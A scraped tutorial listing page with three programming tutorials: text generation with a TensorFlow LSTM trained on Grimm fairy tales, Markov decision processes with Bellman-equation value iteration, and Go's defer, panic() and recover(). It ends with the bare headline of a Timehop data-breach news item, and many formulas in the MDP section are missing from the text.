'https://www.cs.cmu.edu/~spok/grimmtmp/' # Create a directory if needed dir_name = 'stories' if not os.path.exists(dir_name):    os.mkdir(dir_name)    def maybe_download(filename):  """Download a file if not present"""  print('Downloading file: ', dir_name+ os.sep+filename) if not os.path.exists(dir_name+os.sep+filename): filename, _ = urlretrieve(url + filename, dir_name+os.sep+filename) else: print('File ',filename, ' already exists.') return filename num_files = 100 filenames = [format(i, '03d')+'.txt' for i in range(1,101)] for fn in filenames: maybe_download(fn) We will now show example text snippets extracted from two randomly picked stories. The following is the first snippet: Then she said, my dearest benjamin, your father has had these coffins made for you and for your eleven brothers, for if I bring a little girl into the world, you are all to be killed and buried in them.  And as she wept while she was saying this, the son comforted her and said, weep not, dear mother, we will save ourselves, and go hence… The second text snippet is as follows: Red-cap did not know what a wicked creature he was, and was not at all afraid of him. "Good-day, little red-cap," said he. "Thank you kindly, wolf." "Whither away so early, little red-cap?" "To my grandmother's." "What have you got in your apron?" "Cake and wine.  Yesterday was baking-day, so poor sick grandmother is to have something good, to make her stronger."… Preprocessing data In terms of preprocessing, we will initially make all the text lowercase and break the text into character n-grams, where n=2. Consider the following sentence: The king was hunting in the forest. This would break down to a sequence of n-grams, as follows: ['th,' 'e ,' 'ki,' 'ng,' ' w,' 'as,' …] We will use character level bigrams because it greatly reduces the size of the vocabulary compared with using individual words. Moreover, we will be replacing all the bigrams that appear fewer than 10 times in the corpus with a special token (that is, UNK), representing that bigram is unknown. This helps us to reduce the size of the vocabulary even further. Implementing an LSTM Though there are sublibraries in TensorFlow that have already implemented LSTMs ready to go, we will implement one from scratch. This will be very valuable, as in the real world there might be situations where you cannot use these off-the-shelf components directly. We will discuss the hyperparameters and their effects used for the LSTM. Thereafter, we will discuss the parameters (weights and biases) required to implement the LSTM. We will then discuss how these parameters are used to write the operations taking place within the LSTM. This will be followed by understanding how we will sequentially feed data to the LSTM. Next, we will discuss how we can implement the optimization of the parameters using gradient clipping. Finally, we will investigate how we can use the learned model to output predictions, which are essentially bigrams that will eventually add up to a meaningful story. Defining hyperparameters We will define some hyper-parameters required for the LSTM: # Number of neurons in the hidden state variables num_nodes = 128 # Number of data points in a batch we process batch_size = 64 # Number of time steps we unroll for during optimization num_unrollings = 50 dropout = 0.2 # We use dropout The following list describes each of the hyperparameters: num_nodes: This denotes the number of neurons in the cell memory state. When data is abundant, increasing the complexity of the cell memory will give you a better performance; however, at the same time, it slows down the computations. batch_size: This is the amount of data processed in a single step. Increasing the size of the batch gives a better performance, but poses higher memory requirements. num_unrollings: This is the number of time steps used in truncated-BPTT. The higher the num_unrollings steps, the better the performance, but it will increase both the memory requirement and the computational time. dropout: Finally, we will employ dropout (that is, a regularization technique) to reduce overfitting of the model and produce better results; dropout randomly drops information from inputs/outputs/state variables before passing them to their successive operations. This creates redundant features during learning, leading to better performance. Defining parameters Now we will define TensorFlow variables for the actual parameters of the LSTM. First, we will define the input gate parameters: ix: These are weights connecting the input to the input gate im: These are weights connecting the hidden state to the input gate ib: This is the bias Here we will define the parameters: # Input gate (it) - How much memory to write to cell state # Connects the current input to the input gate ix = tf.Variable(tf.truncated_normal([vocabulary_size, num_nodes], stddev=0.02)) # Connects the previous hidden state to the input gate im = tf.Variable(tf.truncated_normal([num_nodes, num_nodes], stddev=0.02)) # Bias of the input gate ib = tf.Variable(tf.random_uniform([1, num_nodes],-0.02, 0.02)) Similarly, we will define such weights for the forget gate, candidate value (used for memory cell computations), and output gate. The forget gate is defined as follows: # Forget gate (ft) - How much memory to discard from cell state # Connects the current input to the forget gate fx = tf.Variable(tf.truncated_normal([vocabulary_size, num_nodes], stddev=0.02)) # Connects the previous hidden state to the forget gate fm = tf.Variable(tf.truncated_normal([num_nodes, num_nodes], stddev=0.02)) # Bias of the forget gate fb = tf.Variable(tf.random_uniform([1, num_nodes],-0.02, 0.02)) The candidate value (used to compute the cell state) is defined as follows: # Candidate value (c~t) - Used to compute the current cell state # Connects the current input to the candidate cx = tf.Variable(tf.truncated_normal([vocabulary_size, num_nodes], stddev=0.02)) # Connects the previous hidden state to the candidate cm = tf.Variable(tf.truncated_normal([num_nodes, num_nodes], stddev=0.02)) # Bias of the candidate cb = tf.Variable(tf.random_uniform([1, num_nodes],-0.02,0.02)) The output gate is defined as follows: # Output gate - How much memory to output from the cell state # Connects the current input to the output gate ox = tf.Variable(tf.truncated_normal([vocabulary_size, num_nodes], stddev=0.02)) # Connects the previous hidden state to the output gate om = tf.Variable(tf.truncated_normal([num_nodes, num_nodes], stddev=0.02)) # Bias of the output gate ob = tf.Variable(tf.random_uniform([1, num_nodes],-0.02,0.02)) Next, we will define variables for the state and output. These are the TensorFlow variables representing the internal cell state and the external hidden state of the LSTM cell. When defining the LSTM computational operation, we define these to be updated with the latest cell state and hidden state values we compute, using the tf.control_dependencies(...) function. # Variables saving state across unrollings. # Hidden state saved_output = tf.Variable(tf.zeros([batch_size, num_nodes]), trainable=False, name='train_hidden') # Cell state saved_state = tf.Variable(tf.zeros([batch_size, num_nodes]), trainable=False, name='train_cell') # Same variables for validation phase saved_valid_output = tf.Variable(tf.zeros([1, num_nodes]),trainable=False, name='valid_hidden') saved_valid_state = tf.Variable(tf.zeros([1, num_nodes]),trainable=False, name='valid_cell') Finally, we will define a softmax layer to get the actual predictions out: # Softmax Classifier weights and biases. w = tf.Variable(tf.truncated_normal([num_nodes, vocabulary_size], stddev=0.02)) b = tf.Variable(tf.random_uniform([vocabulary_size],-0.02,0.02)) Note: that we're using the normal distribution with zero mean and a small standard deviation. This is fine as our model is a simple single LSTM cell. However, when the network gets deeper (that is, multiple LSTM cells stacked on top of each other), more careful initialization techniques are required. One such initialization technique is known as Xavier initialization, proposed by Glorot and Bengio in their paper Understanding the difficulty of training deep feedforward neural networks, Proceedings of the 13th International Conference on Artificial Intelligence and Statistics, 2010. This is available as a variable initializer in TensorFlow, as shown here: https://www.tensorflow.org/api_docs/python/tf/contrib/layers/xavier_initializer. Defining an LSTM cell and its operations With the weights and the bias defined, we can now define the operations within an LSTM cell. These operations include the following: Calculating the outputs produced by the input and forget gates Calculating the internal cell state Calculating the output produced by the output gate Calculating the external hidden state The following is the implementation of our LSTM cell: def lstm_cell(i, o, state):    input_gate = tf.sigmoid(tf.matmul(i, ix) +                            tf.matmul(o, im) + ib)    forget_gate = tf.sigmoid(tf.matmul(i, fx) +                             tf.matmul(o, fm) + fb)    update = tf.matmul(i, cx) + tf.matmul(o, cm) + cb    state = forget_gate * state + input_gate * tf.tanh(update)    output_gate = tf.sigmoid(tf.matmul(i, ox) +                             tf.matmul(o, om) + ob)    return output_gate * tf.tanh(state), state Defining inputs and labels Now we will define training inputs (unrolled) and labels. The training inputs is a list with the num_unrolling batches of data (sequential), where each batch of data is of the [batch_size, vocabulary_size] size: train_inputs, train_labels = [],[] for ui in range(num_unrollings):    train_inputs.append(tf.placeholder(tf.float32,                               shape=[batch_size,vocabulary_size],                               name='train_inputs_%d'%ui))    train_labels.append(tf.placeholder(tf.float32,                               shape=[batch_size,vocabulary_size],                               name = 'train_labels_%d'%ui)) We also define placeholders for validation inputs and outputs, which will be used to compute the validation perplexity. Note that we do not use unrolling for validation-related computations. # Validation data placeholders valid_inputs = tf.placeholder(tf.float32, shape=[1,vocabulary_size],               name='valid_inputs') valid_labels = tf.placeholder(tf.float32, shape=[1,vocabulary_size],               name = 'valid_labels') Defining sequential calculations required to process sequential data Here we will calculate the outputs produced by a single unrolling of the training inputs in a recursive manner. We will also use dropout (refer to Dropout: A Simple Way to Prevent Neural Networks from Overfitting, Srivastava, Nitish, and others, Journal of Machine Learning Research 15 (2014): 1929-1958), as this gives a slightly better performance. Finally we compute the logit values for all the hidden output values computed for the training data: # Keeps the calculated state outputs in all the unrollings # Used to calculate loss outputs = list() # These two python variables are iteratively updated # at each step of unrolling output = saved_output state = saved_state # Compute the hidden state (output) and cell state (state) # recursively for all the steps in unrolling for i in train_inputs:    output, state = lstm_cell(i, output, state)    output = tf.nn.dropout(output,keep_prob=1.0-dropout)    # Append each computed output value    outputs.append(output) # calculate the score values logits = tf.matmul(tf.concat(axis=0, values=outputs), w) + b Next, before calculating the loss, we have to make sure that the output and the external hidden state are updated to the most current value we calculated earlier. This is achieved by adding a tf.control_dependencies condition and keeping the logit and loss calculation within the condition: with tf.control_dependencies([saved_output.assign(output), saved_state.assign(state)]):    # Classifier.    loss = tf.reduce_mean(        tf.nn.softmax_cross_entropy_with_logits_v2(            logits=logits, labels=tf.concat(axis=0,                                            values=train_labels))) We also define the forward propagation logic for validation data. Note that we do not use dropout during validation, but only during training: # Validation phase related inference logic # Compute the LSTM cell output for validation data valid_output, valid_state = lstm_cell(    valid_inputs, saved_valid_output, saved_valid_state) # Compute the logits valid_logits = tf.nn.xw_plus_b(valid_output, w, b) Defining the optimizer Here we will define the optimization process. We will use a state-of-the-art optimizer known as Adam, which is one of the best stochastic gradient-based optimizers to date. Here in the code, gstep is a variable that is used to decay the learning rate over time. We will discuss the details in the next section. Furthermore, we will use gradient clipping to avoid the exploding gradient: # Decays learning rate everytime the gstep increases tf_learning_rate = tf.train.exponential_decay(0.001,gstep,                   decay_steps=1, decay_rate=0.5) # Adam Optimizer. And gradient clipping. optimizer = tf.train.AdamOptimizer(tf_learning_rate) gradients, v = zip(*optimizer.compute_gradients(loss)) gradients, _ = tf.clip_by_global_norm(gradients, 5.0) optimizer = optimizer.apply_gradients(    zip(gradients, v)) Decaying learning rate over time As mentioned earlier, I use a decaying learning rate instead of a constant learning rate. Decaying the learning rate over time is a common technique used in deep learning for achieving better performance and reducing overfitting. The key idea here is to step-down the learning rate (for example, by a factor of 0.5) if the validation perplexity does not decrease for a predefined number of epochs. Let's see how exactly this is implemented, in more detail: First we define gstep and an operation to increment gstep, called inc_gstep as follows: # learning rate decay gstep = tf.Variable(0,trainable=False,name='global_step') # Running this operation will cause the value of gstep # to increase, while in turn reducing the learning rate inc_gstep = tf.assign(gstep, gstep+1) With this defined, we can write some simple logic to call the inc_gstep operation whenever validation loss does not decrease, as follows: # Learning rate decay related # If valid perplexity does not decrease # continuously for this many epochs # decrease the learning rate decay_threshold = 5 # Keep counting perplexity increases decay_count = 0 min_perplexity = 1e10 # Learning rate decay logic def decay_learning_rate(session, v_perplexity):    global decay_threshold, decay_count, min_perplexity    # Decay learning rate    if v_perplexity < min_perplexity:        decay_count = 0        min_perplexity= v_perplexity else:   decay_count += 1    if decay_count >= decay_threshold:        print('\t Reducing learning rate')        decay_count = 0        session.run(inc_gstep) Here we update min_perplexity whenever we experience a new minimum validation perplexity. Also, v_perplexity is the current validation perplexity. Making predictions Now we can make predictions, simply by applying a softmax activation to the logits we calculated previously. We also define prediction operation for validation logits as well: train_prediction = tf.nn.softmax(logits) # Make sure that the state variables are updated # before moving on to the next iteration of generation with tf.control_dependencies([saved_valid_output.assign(valid_output),                             saved_valid_state.assign(valid_state)]):    valid_prediction = tf.nn.softmax(valid_logits) Calculating perplexity (loss) Perplexity is a measure of how surprised the LSTM is to see the next n-gram, given the current n-gram. Therefore, a higher perplexity means poor performance, whereas a lower perplexity means a better performance: train_perplexity_without_exp = tf.reduce_sum(    tf.concat(train_labels,0)*-tf.log(tf.concat(        train_prediction,0)+1e-10))/(num_unrollings*batch_size) # Compute validation perplexity valid_perplexity_without_exp = tf.reduce_sum(valid_labels*-tf. log(valid_prediction+1e-10)) Resetting states We employ state resetting, as we are processing multiple documents. So, at the beginning of processing a new document, we reset the hidden state back to zero. However, it is not very clear whether resetting the state helps or not in practice. On one hand, it sounds intuitive to reset the memory of the LSTM cell at the beginning of each document to zero, when starting to read a new story. On the other hand, this creates a bias in state variables toward zero. We encourage you to try running the algorithm both with and without state resetting and see which method performs well. # Reset train state reset_train_state = tf.group(tf.assign(saved_state,                             tf.zeros([batch_size, num_nodes])),                             tf.assign(saved_output, tf.zeros(                             [batch_size, num_nodes]))) # Reset valid state reset_valid_state = tf.group(tf.assign(saved_valid_state,                             tf.zeros([1, num_nodes])),                             tf.assign(saved_valid_output,                             tf.zeros([1, num_nodes]))) Greedy sampling to break unimodality This is quite a simple technique where we can stochastically sample the next prediction out of the n best candidates found by the LSTM. Furthermore, we will give the probability of picking one candidate to be proportional to the likelihood of that candidate being the next bigram: def sample(distribution):    best_inds = np.argsort(distribution)[-3:]    best_probs = distribution[best_inds]/    np.sum(distribution[best_inds])    best_idx = np.random.choice(best_inds,p=best_probs)    return best_idx Generating new text Finally, we will define the placeholders, variables, and operations required for generating new text. These are defined similarly to what we did for the training data. First, we will define an input placeholder and variables for state and output. Next, we will define state resetting operations. Finally, we will define the LSTM cell calculations and predictions for the new text to be generated: # Text generation: batch 1, no unrolling. test_input = tf.placeholder(tf.float32, shape=[1, vocabulary_size], name = 'test_input') # Same variables for testing phase saved_test_output = tf.Variable(tf.zeros([1,                                num_nodes]),                                trainable=False, name='test_hidden') saved_test_state = tf.Variable(tf.zeros([1,                               num_nodes]),                               trainable=False, name='test_cell') # Compute the LSTM cell output for testing data test_output, test_state = lstm_cell( test_input, saved_test_output, saved_test_state) # Make sure that the state variables are updated # before moving on to the next iteration of generation with tf.control_dependencies([saved_test_output.assign(test_output),                             saved_test_state.assign(test_state)]):    test_prediction = tf.nn.softmax(tf.nn.xw_plus_b(test_output,                                    w, b)) # Reset test state reset_test_state = tf.group(    saved_test_output.assign(tf.random_normal([1,                             num_nodes],stddev=0.05)),    saved_test_state.assign(tf.random_normal([1,                            num_nodes],stddev=0.05))) Example generated text Let's take a look at some of the data generated by the LSTM after 50 steps of learning: they saw that the birds were at her bread, and threw behind him a comb which made a great ridge with a thousand times thousands of spikes. that was a collier. the nixie was at church, and thousands of spikes, they were flowers, however, and had hewn through the glass, the children had formed a hill of mirrors, and was so slippery that it was impossible for the nixie to cross it. then she thought, i will go home quickly and fetch my axe, and cut the hill of glass in half. long before she returned, however, and had hewn through the glass, the children saw her from afar, and he sat down close to it, and was so slippery that it was impossible for the nixie to cross it. To summarize, you can see from the output, that we actually formed a story of a water-nixie in our training corpus. However, our LSTM does not merely output the text, but it adds more color to that story by introducing new things, such as talking about a church and flowers, which were not found in the original text. To write modern natural language processing applications using deep learning algorithms and TensorFlow, you may refer to this book Natural Language Processing with TensorFlow. What is LSTM? Implement Long-short Term Memory (LSTM) with TensorFlow Recurrent Neural Network and the LSTM Architecture
Read more
  • 0
  • 1
  • 10030
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
article-image-reinforcement-learning-mdp-markov-decision-process-tutorial
Fatema Patrawala
09 Jul 2018
11 min read
Save for later

Implement Reinforcement learning using Markov Decision Process [Tutorial]

Fatema Patrawala
09 Jul 2018
11 min read
The Markov decision process, better known as MDP, is an approach in reinforcement learning to take decisions in a gridworld environment. A gridworld environment consists of states in the form of grids. The MDP tries to capture a world in the form of a grid by dividing it into states, actions, models/transition models, and rewards. The solution to an MDP is called a policy and the objective is to find the optimal policy for that MDP task. Thus, any reinforcement learning task composed of a set of states, actions, and rewards that follows the Markov property would be considered an MDP. In this tutorial, we will dig deep into MDPs, states, actions, rewards, policies, and how to solve them using Bellman equations. This article is a reinforcement learning tutorial taken from the book, Reinforcement learning with TensorFlow. Markov decision processes MDP is defined as the collection of the following: States: S Actions: A(s), A Transition model: T(s,a,s') ~ P(s'|s,a) Rewards: R(s), R(s,a), R(s,a,s') Policy:  is the optimal policy In the case of an MDP, the environment is fully observable, that is, whatever observation the agent makes at any point in time is enough to make an optimal decision. In case of a partially observable environment, the agent needs a memory to store the past observations to make the best possible decisions. Let's try to break this into different lego blocks to understand what this overall process means. The Markov property In short, as per the Markov property, in order to know the information of near future (say, at time t+1) the present information at time t matters. Given a sequence, , the first order of Markov says, , that is,  depends only on . Therefore,  will depend only on . The second order of Markov says, , that is,  depends only on  and  In our context, we will follow the first order of the Markov property from now on. Therefore, we can convert any process to a Markov property if the probability of the new state, say , depends only on the current state, , such that the current state captures and remembers the property and knowledge from the past. Thus, as per the Markov property, the world (that is, the environment) is considered to be stationary, that is, the rules in the world are fixed. The S state set The S state set is a set of different states, represented as s, which constitute the environment. States are the feature representation of the data obtained from the environment. Thus, any input from the agent's sensors can play an important role in state formation. State spaces can be either discrete or continuous. The starts from start state and has to reach the goal state in the most optimized path without ending up in bad states (like the red colored state shown in the diagram below). Consider the following gridworld as having 12 discrete states, where the green-colored grid is the goal state, red is the state to avoid, and black is a wall that you'll bounce back from if you hit it head on: The states can be represented as 1, 2,....., 12 or by coordinates, (1,1),(1,2),.....(3,4). Actions The actions are the things an agent can perform or execute in a particular state. In other words, actions are sets of things an agent is allowed to do in the given environment. Like states, actions can also be either discrete or continuous. Consider the following gridworld example having 12 discrete states and 4 discrete actions (UP, DOWN, RIGHT, and LEFT): The preceding example shows the action space to be a discrete set space, that is, a  A where, A = {UP, DOWN, RIGHT, and LEFT}. It can also be treated as a function of state, that is, a = A(s), where depending on the state function, it decides which action is possible. Transition model The transition model T(s, a, s') is a function of three variables, which are the current state (s), action (a), and the new state (s'), and defines the rules to play the game in the environment. It gives probability P(s'|s, a), that is, the probability of landing up in the new s' state given that the agent takes an action, a, in given state, s. The transition model plays the crucial role in a stochastic world, unlike the case of a deterministic world where the probability for any landing state other than the determined one will have zero probability. Let's consider the following environment (world) and consider different cases, determined and stochastic: Since the actions a  A where, A = {UP, DOWN, RIGHT, and LEFT}. The behavior of these two cases depends on certain factors: Determined environment: In a determined environment, if you take a certain action, say UP, you will certainly perform that action with probability 1. Stochastic environment: In a stochastic environment, if you take the same action, say UP, there will certain probability say 0.8 to actually perform the given action and there is 0.1 probability it can perform an action (either LEFT or RIGHT) perpendicular to the given action, UP. Here, for the s state and the UP action transition model, T(s',UP, s) = P(s'| s,UP) = 0.8. Since T(s,a,s') ~ P(s'|s,a), where the probability of new state depends on the current state and action only, and none of the past states. Thus, the transition model follows the first order Markov property. We can also say that our universe is also a stochastic environment, since the universe is composed of atoms that are in different states defined by position and velocity. Actions performed by each atom change their states and cause changes in the universe. Rewards The reward of the state quantifies the usefulness of entering into a state. There are three different forms to represent the reward namely, R(s), R(s, a) and R(s, a, s'), but they are all equivalent. For a particular environment, the domain knowledge plays an important role in the assignment of rewards for different states as minor changes in the reward do matter for finding the optimal solution to an MDP problem. There are two approaches we reward our agent for when taking a certain action. They are: Credit assignment problem: We look at the past and check which actions led to the present reward, that is, which action gets the credit Delayed rewards: In contrast, in the present state, we check which action to take that will lead us to potential rewards Delayed rewards form the idea of foresight planning. Therefore, this concept is being used to calculate the expected reward for different states. We will discuss this in the later sections. Policy Until now, we have covered the blocks that create an MDP problem, that is, states, actions, transition models, and rewards, now comes the solution. The policy is the solution to an MDP problem. The policy is a function that takes the state as an input and outputs the action to be taken. Therefore, the policy is a command that the agent has to obey.  is called the optimal policy, which maximizes the expected reward. Among all the policies taken, the optimal policy is the one that optimizes to maximize the amount of reward received or expected to receive over a lifetime. For an MDP, there's no end of the lifetime and you have to decide the end time. Thus, the policy is nothing but a guide telling which action to take for a given state. It is not a plan but uncovers the underlying plan of the environment by returning the actions to take for each state. The Bellman equations Since the optimal  policy is the policy that maximizes the expected rewards, therefore, , where  means the expected value of the rewards obtained from the sequence of states agent observes if it follows the  policy. Thus,  outputs the  policy that has the highest expected reward. Similarly, we can also calculate the utility of the policy of a state, that is, if we are at the s state, given a  policy, then, the utility of the  policy for the s state, that is,  would be the expected rewards from that state onward: The immediate reward of the state, that is,  is different than the utility of the  state (that is, the utility of the optimal policy of the  state) because of the concept of delayed rewards. From now onward, the utility of the  state will refer to the utility of the optimal policy of the state, that is, the  state. Moreover, the optimal policy can also be regarded as the policy that maximizes the expected utility. Therefore, where, T(s,a,s') is the transition probability, that is, P(s'|s,a) and U(s') is the utility of the new landing state after the a action is taken on the s state.  refers to the summation of all possible new state outcomes for a particular action taken, then whichever action gives the maximum value of  that is considered to be the part of the optimal policy and thereby, the utility of the 's' state is given by the following Bellman equation, where,  is the immediate reward and  is the reward from future, that is, the discounted utilities of the 's' state where the agent can reach from the given s state if the action, a, is taken. Solving the Bellman equation to find policies Say we have some n states in the given environment and if we see the Bellman equation, we find out that n states are given; therefore, we will have n equations and n unknown but the  function makes it non-linear. Thus, we cannot solve them as linear equations. Therefore, in order to solve: Start with an arbitrary utility Update the utilities based on the neighborhood until convergence, that is, update the utility of the state using the Bellman equation based on the utilities of the landing states from the given state Iterate this multiple times to lead to the true value of the states. This process of iterating to convergence towards the true value of the state is called value iteration. For the terminal states where the game ends, the utility of those terminal state equals the immediate reward the agent receives while entering the terminal state. Let's try to understand this by implementing an example. An example of value iteration using the Bellman equation Consider the following environment and the given information: Given information: A, C, and X are the names of some states. The green-colored state is the goal state, G, with a reward of +1. The red-colored state is the bad state, B, with a reward of -1, try to prevent your agent from entering this state Thus, the green and red states are the terminal states, enter either and the game is over. If the agent encounters the green state, that is, the goal state, the agent wins, while if they enter the red state, then the agent loses the game. ,  (that is, reward for all states except the G and B states is -0.04),  (that is, the utility at the first time step is 0, except the G and B states). Transition probability T(s,a,s') equals 0.8 if going in the desired direction; otherwise, 0.1 each if going perpendicular to the desired direction. For example, if the action is UP then with 0.8 probability, the agent goes UP but with 0.1 probability it goes RIGHT and 0.1 to the LEFT. Questions:  Find , the utility of the X state at time step 1, that is, the agent will go through one iteration Similarly, find  Solution: R(X) = -0.04 Action as'RIGHT G 0.8+10.8 x 1 = 0.8RIGHTC0.100.1 x 0 = 0RIGHTX0.100.1 x 0 = 0 Thus, for action a = RIGHT, Action as'DOWN C 0.800.8 x 0 = 0DOWNG0.1+10.1 x 1 = 0.1DOWNA0.100.1 x 0 = 0 Thus, for action a = DOWN, Action as'UP X 0.800.8 x 0 = 0UPG0.1+10.1 x 1 = 0.1UPA0.100.1 x 0 = 0 Thus, for action a = UP, Action as'LEFT A 0.800.8 x 0 = 0LEFTX0.100.1 x 0 = 0LEFTC0.100.1 x 0 = 0 Thus, for action a = LEFT, Therefore, among all actions, Therefore, , where  and  Similarly, calculate  and  and we get  and  Since, , and, R(X) = -0.04 Action as'RIGHT G 0.8+10.8 x 1 = 0.8RIGHTC0.1-0.040.1 x -0.04 = -0.004RIGHTX0.10.360.1 x 0.36 = 0.036 Thus, for action a = RIGHT, Action as'DOWN C 0.8-0.040.8 x -0.04 = -0.032DOWNG0.1+10.1 x 1 = 0.1DOWNA0.1-0.040.1 x -0.04 = -0.004 Thus, for action a = DOWN, Action as'UP X 0.80.360.8 x 0.36 = 0.288UPG0.1+10.1 x 1 = 0.1UPA0.1-0.040.1 x -0.04 = -0.004 Thus, for action a = UP, Action as'LEFT A 0.8-0.040.8 x -0.04 = -0.032LEFTX0.10.360.1 x 0.36 = 0.036LEFTC0.1-0.040.1 x -0.04 = -0.004 Thus, for action a = LEFT, Therefore, among all actions, Therefore, , where  and  Therefore, the answers to the preceding questions are:     Policy iteration The process of obtaining optimal utility by iterating over the policy and updating the policy itself instead of value until the policy converges to the optimum is called policy iteration. The process of policy iteration is as follows: Start with a random policy,  For the given  policy at iteration step t, calculate  by using the following formula: Improve the  policy by This ends an interesting reinforcement learning tutorial. Want to implement state-of-the-art Reinforcement Learning algorithms from scratch? Get this best-selling title, Reinforcement Learning with TensorFlow. How Reinforcement Learning works Convolutional Neural Networks with Reinforcement Learning Getting started with Q-learning using TensorFlow
Read more
  • 0
  • 0
  • 25990

article-image-understanding-go-internals-defer-panic-and-recover-functions-tutorial
Packt Editorial Staff
09 Jul 2018
8 min read
Save for later

Understanding Go Internals: defer, panic() and recover() functions [Tutorial]

Packt Editorial Staff
09 Jul 2018
8 min read
The Go programming language, often referred to as Golang, is making strides with masterclass developments and architecture by the greatest programming minds.  The Go features are extremely handy, and you can use them all the time. However, there is nothing more rewarding than being able to see and understand what is going on in the background and how Go operates behind the scenes. In this article we will learn to use the defer keyword, panic() and recover() functions in Go. This article is extracted from the First Edition of Mastering Go written by Mihalis Tsoukalos. The concepts discussed in this article (and more) have been updated or improved in the third edition of Mastering Go. The defer keyword The defer keyword postpones the execution of a function until the surrounding function returns. It is widely used in file input and output operations because it saves you from having to remember when to close an opened file: the defer keyword allows you to put the function call that closes an opened file near to the function call that opened it. You will also see defer in action in the section that talks about the panic()  and recover() built-in Go functions. It is very important to remember that deferred functions are executed in Last In First Out (LIFO) order after the return of the surrounding function. Put simply, this means that if you defer function f1() first, function f2() second, and function f3() third in the same surrounding function, when the surrounding function is about to return, function f3() will be executed first, function f2() will be executed second, and function f1() will be the last one to get executed. As this definition of defer is a little unclear, I think that you will understand the use of defer a little better by looking at the Go code and the output of the defer.go  program, which will be presented in three parts. The first part of the program follows: package main import (  "fmt" ) func d1() { for i := 3; i > 0; i-- { defer fmt.Print(i, " ") } } Apart from the import block, the preceding Go code implements a function named d1() with a for loop and a defer statement that will be executed three times. The second part of defer.go   contains the following Go code: func d2() { for i := 3; i > 0; i-- { defer func() { fmt.Print(i, " ") }() } fmt.Println() } In this part of the code, you can see the implementation of another function that is named d2(). The d2() function also contains a for loop and a defer statement that will be also executed three times. However, this time the defer keyword is applied to an anonymous function instead of a single fmt.Print() statement. Additionally, the anonymous function takes no parameters. The last part of the Go code follows: func d3() { for i := 3; i > 0; i-- { defer func(n int) { fmt.Print(n, " ") }(i) } } func main() { d1() d2() fmt.Println() d3() fmt.Println() } Apart from the main() function that calls the d1(), d2(), and d3() functions, you can also see the implementation of the d3() function, which has a for loop that uses the defer keyword on an anonymous function. However, this time the anonymous function requires one integer parameter named n. The Go code tells us that the n parameter takes its value from the i variable used in the for loop. Executing defer.go will create the following output: $ go run defer.go 1 2 3 0 0 0 1 2 3 You will most likely find the generated output complicated and challenging to understand. This underscores the fact that the operation and the results of the use of defer can be tricky if your code is not clear and unambiguous. Let's examine the results in order to get a better idea of how tricky defer can be if you do not pay close attention to your code. We will start with the first line of the output (1 2 3), which is generated by the d1() function. The values of i in d1() are 3, 2, and 1 in that order. The function that is deferred in d1() is the fmt.Print() statement. As a result, when the d1() function is about to return, you get the three values of the i variable of the for loop in reverse order because deferred functions are executed in LIFO order. Now, let us inspect the second line of the output that is produced by the d2() function. It is really strange that we got three zeros instead of 1 2 3 in the output. The reason for this, however, is relatively simple. After the for loop has ended, the value of i is 0, because it is that value of i that made the for loop terminate. However, the tricky part here is that the deferred anonymous function is evaluated after the for loop ends, because it has no parameters. This means that is evaluated three times for an i value of 0, hence the generated output! This kind of confusing code is what might lead to the creation of nasty bugs in your projects, so try to avoid it! Last, we will talk about the third line of the output, which is generated by the d3() function. Due to the parameter of the anonymous function, each time the anonymous function is deferred, it gets and uses the current value of i. As a result, each execution of the anonymous function has a different value to process, thus the generated output. After this, it should be clear that the best approach to the use of defer is the third one, which is exhibited in the d3() function. This is so because you intentionally pass the desired variable in the anonymous function in an easy to understand way. Panic and Recover This technique involves the use of the panic() and recover() functions, and it will be presented in panicRecover.go, which you will review in three parts. Strictly speaking, panic() is a built-in Go function that terminates the current flow of a Go program and starts panicking! On the other hand, the recover() function, which is also a built-in Go function, allows you to take back the control of a goroutine that just panicked using panic(). The first part of the program follows: package main import ( "fmt" ) func a() { fmt.Println("Inside a()") defer func() { if c := recover(); c != nil { fmt.Println("Recover inside a()!") } }() fmt.Println("About to call b()") b() fmt.Println("b() exited!") fmt.Println("Exiting a()") } Apart from the import block, this part includes the implementation of the a() function. The most important part of the a() function is the defer block of code, which implements an anonymous function that will be called when there is a call to panic(). The second code segment of panicRecover.go follows next: func b() { fmt.Println("Inside b()") panic("Panic in b()!") fmt.Println("Exiting b()") } The last part of the program, which illustrates the panic() and recover() functions, is as follows: func main() { a() fmt.Println("main() ended!") } Executing panicRecover.go will create the following output: $ go run panicRecover.go Inside a() About to call b() Inside b() Recover inside a()! main() ended! What just happened here is really impressive! However, as you can see from the output, the a() function did not end normally, because its last two statements did not get executed: fmt.Println("b() exited!") fmt.Println("Exiting a()") Nevertheless, the good thing is that panicRecover.go ended according to our will without panicking because the anonymous function used in defer took control of the situation! Also note that function b() knows nothing about function a(). However, function a() contains Go code that handles the panic condition of function b()! Using the panic function on its own You can also use the panic() function on its own without any attempt to recover, and this subsection will show you its results using the Go code of justPanic.go, which will be presented in two parts. The first part of justPanic.go follows next: package main import ( "fmt" "os" ) As you can see, the use of panic() does not require any extra Go packages. The second part of justPanic.go is shown in the following Go code: func main() { if len(os.Args) == 1 { panic("Not enough arguments!") } fmt.Println("Thanks for the argument(s)!") } If your Go program does not have at least one command line argument, it will call the panic() function. The panic() function takes one parameter, which is the error message that you want to print on the screen. Executing justPanic.go on a macOS High Sierra machine will create the following output: $ go run justPanic.go panic: Not enough arguments! goroutine 1 [running]: main.main() /Users/mtsouk/ch2/code/justPanic.go:10 +0x9e exit status 2 Thus, using the panic() function on its own will terminate the Go program without giving you the opportunity to recover! Therefore use of the panic() and recover() pair is much more practical and professional than just using panic() alone. To summarize, we covered some of the interesting Go topics like; defer keyword; the panic() and recover() functions. To explore other major features and packages in Go, get our latest edition in Go programming, Mastering Go, written by Mihalis Tsoukalos. Implementing memory management with Golang’s garbage collector Why is Go the go-to language for cloud native development? – An interview with Mina Andrawos How to build a basic server side chatbot using Go How Concurrency and Parallelism works in Golang [Tutorial]  
Read more
  • 0
  • 0
  • 29173

article-image-timehop-suffers-data-breach-21-million-users-data-compromised
Richard Gall
09 Jul 2018
3 min read
Save for later

Timehop suffers data breach; 21 million users' data compromised

Richard Gall
09 Jul 2018
3 min read
